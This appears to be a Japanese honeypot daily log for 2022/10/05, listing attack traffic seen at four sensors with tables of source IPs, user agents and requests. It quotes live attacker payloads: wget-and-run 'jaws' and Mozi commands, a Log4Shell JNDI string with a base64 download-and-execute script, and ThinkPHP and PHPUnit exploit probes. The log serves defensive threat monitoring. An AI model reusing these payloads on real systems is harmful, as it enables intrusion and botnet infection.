ハニーポット(仮) 観測記録 2022/10/05分です。
特徴
共通
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
Location:JP
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
/.awsへのスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
Location:US
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 185.216.71.192/jaws; sh /tmp/jaws
Location:UK
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
JBossの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 185.216.71.192/jaws; sh /tmp/jaws
Location:SG
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
curlによるスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 85.31.46.179/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:117 (前日比:53)
US:総アクセス数:64 (前日比:-22)
UK:総アクセス数:59 (前日比:-11)
SG:総アクセス数:63 (前日比:-14)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 34.236.171.201 | United States |
| 1 | 35.230.66.77 | United States |
| 1 | 46.19.141.122 | Panama |
| 3 | 46.101.188.10 | United States |
| 1 | 54.85.5.231 | United States |
| 7 | 95.214.235.205 | Ukraine |
| 18 | 123.157.222.168 | China |
| 9 | 135.125.244.48 | France |
| 8 | 135.125.246.189 | France |
| 1 | 137.184.127.66 | United States |
| 2 | 147.182.148.91 | United States |
| 1 | 161.35.213.88 | United States |
| 2 | 164.92.198.128 | United States |
| 48 | 165.22.50.117 | United States |
| 1 | 167.99.144.251 | United States |
| 1 | 167.248.133.117 | United States |
| 1 | 172.104.242.173 | United States |
| 1 | 172.105.77.209 | United States |
| 1 | 185.158.115.237 | Russia |
| 3 | 185.254.196.115 | Ukraine |
| 1 | 192.241.215.66 | United States |
| 1 | 198.235.24.143 | United States |
| 4 | 203.76.241.10 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 32 | - |
| 1 | Mozila/5.0 |
| 1 | Mozilla/5.0 (Linux; Android 6.0; CAM-L21 Build/HUAWEICAM-L21; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/62.0.3202.84 Mobile Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
| 1 | Mozilla/5.0 (SMART-TV; X11; Linux armv7l) AppleWebkit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 |
| 47 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 |
| 29 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 1 | Mozilla/5.0 zgrab/0.x |
| 1 | python-requests/2.18.4 |
| 1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//167[.]99[.]146[.]14:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE5Mi4yNDEuMTM3LjE1Ni9jMHIwbjR4LnNoOyBjdXJsIC1PIGh0dHA6Ly8xOTIuMjQxLjEzNy4xNTYvYzByMG40eC5zaDsgY2htb2QgNzc3IGMwcjBuNHguc2g7IHNoIGMwcjBuNHguc2g7IHRmdHAgMTkyLjI0MS4xMzcuMTU2IC1jIGdldCBjMHIwbjR4LnNoOyBjaG1vZCA3NzcgYzByMG40eC5zaDsgc2ggYzByMG40eC5zaDsgdGZ0cCAtciBjMHIwbjR4Mi5zaCAtZyAxOTIuMjQxLjEzNy4xNTY7IGNobW9kIDc3NyBjMHIwbjR4Mi5zaDsgc2ggYzByMG40eDIuc2g7IGZ0cGdldCAtdiAtdSBhbm9ueW1vdXMgLXAgYW5vbnltb3VzIC1QIDIxIDE5Mi4yNDEuMTM3LjE1NiBjMHIwbjR4MS5zaCBjMHIwbjR4MS5zaDsgc2ggYzByMG40eDEuc2g7IHJtIC1yZiBjMHIwbjR4LnNoIGMwcjBuNHguc2ggYzByMG40eDIuc2ggYzByMG40eDEuc2g7IHJtIC1yZiAq}') |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - |
||
| 6 | \x16\x03\x01 |
||
| 1 | \x97[(t.\xb8\xbbF=\xd5[us\x01\xaa\x8e\x90\x95\x13~\xb0\xb1Q~\n |
||
| 1 | \xd6\xb1\xe6\x94cu\x8adF\xbb\x98a~\xf5\x90\n |
||
| 1 | GET | /.aws/credentials |
HTTP/1.1 |
| 2 | GET | /.env.bak |
HTTP/1.1 |
| 1 | GET | /.env.example |
HTTP/1.1 |
| 30 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /0bef |
HTTP/1.0 |
| 1 | GET | /:80:undefined?id= |
HTTP/1.1 |
| 2 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /admin/.env |
HTTP/1.1 |
| 1 | GET | /api/.env |
HTTP/1.1 |
| 1 | GET | /app/.env |
HTTP/1.1 |
| 1 | GET | /app/config/.env |
HTTP/1.1 |
| 1 | GET | /application/.env |
HTTP/1.1 |
| 1 | GET | /apps/.env |
HTTP/1.1 |
| 1 | GET | /audio/.env |
HTTP/1.1 |
| 1 | GET | /backend/.env |
HTTP/1.1 |
| 1 | GET | /base/.env |
HTTP/1.1 |
| 1 | GET | /blog/.env |
HTTP/1.1 |
| 1 | GET | /cgi-bin/.env |
HTTP/1.1 |
| 1 | GET | /conf/.env |
HTTP/1.1 |
| 1 | GET | /config/.env |
HTTP/1.1 |
| 1 | GET | /core/.env |
HTTP/1.1 |
| 1 | GET | /crm/.env |
HTTP/1.1 |
| 1 | GET | /database/.env |
HTTP/1.1 |
| 1 | GET | /demo/.env |
HTTP/1.1 |
| 1 | GET | /dev/.env |
HTTP/1.1 |
| 1 | GET | /development/.env |
HTTP/1.1 |
| 1 | GET | /ec2-18-179-20-5.ap-northeast-1.compute.amazonaws.com/.env |
HTTP/1.1 |
| 1 | GET | /ec2-18-179-20-5.ap-northeast-1.compute.amazonaws.com/api/.env |
HTTP/1.1 |
| 2 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /info.php |
HTTP/1.1 |
| 1 | GET | /laravel/.env |
HTTP/1.1 |
| 1 | GET | /library/.env |
HTTP/1.1 |
| 1 | GET | /local/.env |
HTTP/1.1 |
| 1 | GET | /new/.env |
HTTP/1.1 |
| 1 | GET | /newsite/.env |
HTTP/1.1 |
| 1 | GET | /old/.env |
HTTP/1.1 |
| 1 | GET | /phpinfo.php |
HTTP/1.1 |
| 1 | GET | /phpinfo |
HTTP/1.1 |
| 1 | GET | /prod/.env |
HTTP/1.1 |
| 1 | GET | /production/.env |
HTTP/1.1 |
| 1 | GET | /protected/.env |
HTTP/1.1 |
| 1 | GET | /public/.env |
HTTP/1.1 |
| 1 | GET | /sites/all/libraries/mailchimp/.env |
HTTP/1.1 |
| 1 | GET | /src/.env |
HTTP/1.1 |
| 1 | GET | /storage/.env |
HTTP/1.1 |
| 1 | GET | /user/login/ |
HTTP/1.1 |
| 1 | GET | /vendor/.env |
HTTP/1.1 |
| 1 | GET | /vendor/laravel/.env |
HTTP/1.1 |
| 1 | GET | /web/.env |
HTTP/1.1 |
| 1 | GET | /website/.env |
HTTP/1.1 |
| 1 | GET | /www/.env |
HTTP/1.1 |
| 2 | GET | http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php |
HTTP/1.0 |
| 2 | GET | http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/mysqladmin/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.2/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.0/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1.2/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.3/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.4/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.7/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.9.2/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.8.0.2/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2/scripts/setup.php |
HTTP/1.0 |
| 2 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php |
HTTP/1.0 |
| 2 | GET | http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php |
HTTP/1.0 |
| 1 | POST | /HNAP1/ |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 2.57.122.25 | Romania |
| 4 | 20.25.154.147 | United States |
| 2 | 45.227.254.54 | Belize |
| 1 | 46.19.141.122 | Panama |
| 1 | 51.79.29.48 | Canada |
| 18 | 54.37.79.75 | France |
| 1 | 54.85.5.231 | United States |
| 1 | 61.3.190.176 | India |
| 1 | 64.225.61.4 | United States |
| 1 | 74.208.157.96 | United States |
| 1 | 78.142.18.92 | Bulgaria |
| 1 | 79.110.62.205 | Bulgaria |
| 1 | 85.31.46.179 | Bulgaria |
| 1 | 87.236.176.70 | Belgium |
| 1 | 104.248.53.239 | United States |
| 1 | 110.178.46.102 | China |
| 1 | 157.245.223.205 | United States |
| 2 | 162.142.125.7 | United States |
| 2 | 162.142.125.210 | United States |
| 1 | 172.105.77.209 | United States |
| 1 | 183.215.152.184 | China |
| 1 | 184.105.247.200 | United States |
| 1 | 185.220.101.184 | Germany |
| 8 | 185.254.196.223 | Ukraine |
| 2 | 188.166.116.161 | United States |
| 1 | 192.241.204.84 | United States |
| 1 | 192.241.214.84 | United States |
| 1 | 192.241.220.59 | United States |
| 1 | 192.241.220.99 | United States |
| 1 | 198.20.189.97 | Canada |
| 1 | 198.235.24.15 | United States |
| 1 | 205.185.122.184 | United States |
| 1 | 206.189.101.163 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 12 | - |
| 1 | Go-http-client/1.1 |
| 1 | Hello, world |
| 1 | Mozila/5.0 |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| 1 | Mozilla/5.0 (Android 7.0; Mobile; rv:60.0) Gecko/60.0 Firefox/60.0 |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15 |
| 3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/60.0.3112.78 Chrome/60.0.3112.78 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
| 30 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 3 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - |
||
| 1 | MGLNDD_34.68.118.83_80\n |
||
| 2 | \x03 |
||
| 4 | \x16\x03\x01 |
||
| 1 | CONNECT | google[.]com:443 |
HTTP/1.1 |
| 30 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp |
HTTP/1.0 |
| 9 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//110[.]178[.]46[.]102:59282/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+185[.]216[.]71[.]192/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /user/login/ |
HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | http[:]//www[.]google[.]com/ |
HTTP/1.0 |
| 1 | POST | /HNAP1/ |
HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 4.1.229.86 | United States |
| 10 | 18.117.173.26 | United States |
| 8 | 34.90.74.192 | United States |
| 1 | 41.238.19.39 | Egypt |
| 1 | 46.19.141.122 | Panama |
| 1 | 64.62.197.202 | United States |
| 1 | 66.240.192.82 | United States |
| 1 | 78.142.18.92 | Bulgaria |
| 1 | 85.31.46.179 | Bulgaria |
| 1 | 92.255.85.183 | Hong Kong |
| 6 | 106.75.16.152 | China |
| 1 | 152.32.155.235 | Hong Kong |
| 1 | 157.230.230.9 | United States |
| 2 | 162.142.125.10 | United States |
| 1 | 167.99.144.251 | United States |
| 1 | 172.104.242.173 | United States |
| 2 | 185.108.106.230 | India |
| 1 | 185.216.71.181 | Bulgaria |
| 8 | 185.254.196.223 | Ukraine |
| 1 | 192.241.194.29 | United States |
| 1 | 192.241.203.208 | United States |
| 1 | 192.241.212.70 | United States |
| 1 | 192.241.215.237 | United States |
| 2 | 194.165.16.71 | Panama |
| 1 | 205.210.31.128 | United States |
| 1 | 205.210.31.159 | United States |
| 1 | 206.189.239.164 | United States |
| 1 | 217.146.82.141 | United Kingdom |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 18 | - |
| 1 | Go-http-client/1.1 |
| 1 | Hello, world |
| 1 | IE/4.0 (Windows NT 3.1; rv:2.0.1) Gecko/20100101 Firefox/4.4.2 |
| 2 | Mozila/5.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0 |
| 3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 |
| 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 |
| 1 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 |
| 1 | Mozilla/5.0 (Windows NT 8_1; Win64; x64) AppleWebKit/539.43 (KHTML, like Gecko) Chrome/40.0.2535 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 9_1_2; Win64; x64) AppleWebKit/551.44 (KHTML, like Gecko) Chrome/41.0.931 Safari/537.36 |
| 9 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/542.54 (KHTML, like Gecko) Chrome/63.0.2122 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 3 | Mozilla/5.0 zgrab/0.x |
| 2 | python-requests/2.28.1 |
| 1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//167[.]99[.]146[.]14:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE5Mi4yNDEuMTM3LjE1Ni9jMHIwbjR4LnNoOyBjdXJsIC1PIGh0dHA6Ly8xOTIuMjQxLjEzNy4xNTYvYzByMG40eC5zaDsgY2htb2QgNzc3IGMwcjBuNHguc2g7IHNoIGMwcjBuNHguc2g7IHRmdHAgMTkyLjI0MS4xMzcuMTU2IC1jIGdldCBjMHIwbjR4LnNoOyBjaG1vZCA3NzcgYzByMG40eC5zaDsgc2ggYzByMG40eC5zaDsgdGZ0cCAtciBjMHIwbjR4Mi5zaCAtZyAxOTIuMjQxLjEzNy4xNTY7IGNobW9kIDc3NyBjMHIwbjR4Mi5zaDsgc2ggYzByMG40eDIuc2g7IGZ0cGdldCAtdiAtdSBhbm9ueW1vdXMgLXAgYW5vbnltb3VzIC1QIDIxIDE5Mi4yNDEuMTM3LjE1NiBjMHIwbjR4MS5zaCBjMHIwbjR4MS5zaDsgc2ggYzByMG40eDEuc2g7IHJtIC1yZiBjMHIwbjR4LnNoIGMwcjBuNHguc2ggYzByMG40eDIuc2ggYzByMG40eDEuc2g7IHJtIC1yZiAq}') |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | MGLNDD_132.145.66.34_80\n |
||
| 3 | \x03 |
||
| 4 | \x16\x03\x01 |
||
| 1 | CONNECT | google[.]com:443 |
HTTP/1.1 |
| 10 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /0bef |
HTTP/1.0 |
| 1 | GET | /:80:undefined?id= |
HTTP/1.1 |
| 1 | GET | /?%3Cplay%3Ewithme%3C/%3E |
HTTP/1.1 |
| 1 | GET | /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=xwo3k2d9 |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /axis2-admin/ |
HTTP/1.1 |
| 1 | GET | /axis2/ |
HTTP/1.1 |
| 1 | GET | /axis2/axis2-admin/ |
HTTP/1.1 |
| 4 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /invoker/readonly |
HTTP/1.1 |
| 1 | GET | /jenkins/login |
HTTP/1.1 |
| 1 | GET | /login |
HTTP/1.1 |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /script |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+185[.]216[.]71[.]192/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /user/login/ |
HTTP/1.1 |
| 1 | GET | /users/sign_in |
HTTP/1.1 |
| 1 | GET | /wp-login.php |
HTTP/1.1 |
| 1 | GET | http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.0.2/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.2/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.3/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.1.2/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.3/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.4/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.9.2/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//132[.]145[.]66[.]34:80/phpMyAdmin2/scripts/setup.php |
HTTP/1.0 |
| 1 | HEAD | / |
HTTP/1.1 |
| 2 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.55.53.144 | United States |
| 1 | 20.150.210.254 | United States |
| 1 | 34.138.181.133 | United States |
| 1 | 36.110.211.2 | China |
| 2 | 45.42.200.241 | United States |
| 19 | 51.79.29.48 | Canada |
| 3 | 54.37.79.75 | France |
| 1 | 54.85.5.231 | United States |
| 1 | 58.107.38.91 | Australia |
| 1 | 64.225.3.142 | United States |
| 1 | 66.240.192.82 | United States |
| 1 | 74.117.198.11 | United States |
| 1 | 85.31.46.179 | Bulgaria |
| 3 | 139.59.1.248 | Singapore |
| 1 | 159.89.43.181 | United States |
| 2 | 162.142.125.219 | United States |
| 1 | 163.123.143.186 | United States |
| 1 | 165.22.215.115 | United States |
| 1 | 167.99.144.251 | United States |
| 3 | 167.172.28.219 | United States |
| 2 | 167.248.133.62 | United States |
| 1 | 172.104.242.173 | United States |
| 1 | 183.136.225.35 | China |
| 1 | 185.130.45.222 | Belize |
| 1 | 185.216.71.180 | Bulgaria |
| 1 | 185.216.71.181 | Bulgaria |
| 1 | 190.83.71.163 | Brazil |
| 1 | 192.241.208.155 | United States |
| 1 | 192.241.212.151 | United States |
| 1 | 192.241.212.152 | United States |
| 1 | 192.241.213.57 | United States |
| 2 | 194.165.16.78 | Panama |
| 1 | 195.178.120.116 | Bulgaria |
| 1 | 205.210.31.148 | United States |
| 1 | 216.218.206.123 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 17 | - |
| 1 | Go-http-client/1.1 |
| 1 | Hello, world |
| 2 | Mozila/5.0 |
| 1 | Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SM-T537A Build/KOT49H) AppleWebKit/537.36 (KHTML like Gecko) Chrome/35.0.1916.141 Safari/537.36 |
| 1 | Mozilla/5.0 (Linux; Android 8.0.0; ANE-LX3 Build/HUAWEIANE-LX3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 |
| 2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
| 27 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 3 | Mozilla/5.0 zgrab/0.x |
| 1 | curl/7.29.0 |
| 1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//167[.]99[.]146[.]14:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE5Mi4yNDEuMTM3LjE1Ni9jMHIwbjR4LnNoOyBjdXJsIC1PIGh0dHA6Ly8xOTIuMjQxLjEzNy4xNTYvYzByMG40eC5zaDsgY2htb2QgNzc3IGMwcjBuNHguc2g7IHNoIGMwcjBuNHguc2g7IHRmdHAgMTkyLjI0MS4xMzcuMTU2IC1jIGdldCBjMHIwbjR4LnNoOyBjaG1vZCA3NzcgYzByMG40eC5zaDsgc2ggYzByMG40eC5zaDsgdGZ0cCAtciBjMHIwbjR4Mi5zaCAtZyAxOTIuMjQxLjEzNy4xNTY7IGNobW9kIDc3NyBjMHIwbjR4Mi5zaDsgc2ggYzByMG40eDIuc2g7IGZ0cGdldCAtdiAtdSBhbm9ueW1vdXMgLXAgYW5vbnltb3VzIC1QIDIxIDE5Mi4yNDEuMTM3LjE1NiBjMHIwbjR4MS5zaCBjMHIwbjR4MS5zaDsgc2ggYzByMG40eDEuc2g7IHJtIC1yZiBjMHIwbjR4LnNoIGMwcjBuNHguc2ggYzByMG40eDIuc2ggYzByMG40eDEuc2g7IHJtIC1yZiAq}') |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | MGLNDD_13.67.44.234_80 |
||
| 2 | \x03 |
||
| 1 | \x12\xd2\x8d$Z<f\xd0\r\xb6\xd2A_e\x1fd\x80\xdep\xa4\xa0\xfa2\xa4\x1av\xf3\x0f\xac\xfa2\xa4\xa1\xfep\xa4\xa0\xfa1\xac\xa0\xfa2\xa4\xa0\xfa2\xa4 |
||
| 7 | \x16\x03\x01 |
||
| 1 | \x81\xc8\x03>|\xa3'\xd0\x04\x81o\xf0l\xce\x85IW>c\x1fw\x1a!\x1f\xcd\x96\xe0\xb4{\x1a!\x1fv\x1ec\x1fw\x1a\"\x17w\x1a!\x1fw\x1a!\x1f\xdd\x1a!\x1fw\x1a |
||
| 1 | cM\x85\xa2F\x84\xad2 |
||
| 29 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /0bef |
HTTP/1.0 |
| 1 | GET | /:80:undefined?id= |
HTTP/1.1 |
| 1 | GET | /SWM9entP7GXRqYvfs3bU5BhdkTh |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
